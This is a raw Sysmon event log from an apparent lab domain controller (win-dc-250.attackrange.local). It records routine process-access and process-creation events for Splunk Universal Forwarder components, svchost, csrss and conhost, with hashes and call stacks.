AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:18.047{08A6967A-45C5-6000-B802-000000009A01}44084676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.531{08A6967A-45C7-6000-BA02-000000009A01}31482516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-45C7-6000-BA02-000000009A01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45C7-6000-BA02-000000009A01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.375{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-45C7-6000-BA02-000000009A01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:19.235{08A6967A-45C7-6000-BA02-000000009A01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-45C8-6000-BB02-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45C8-6000-BB02-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:20.391{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-45C8-6000-BB02-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 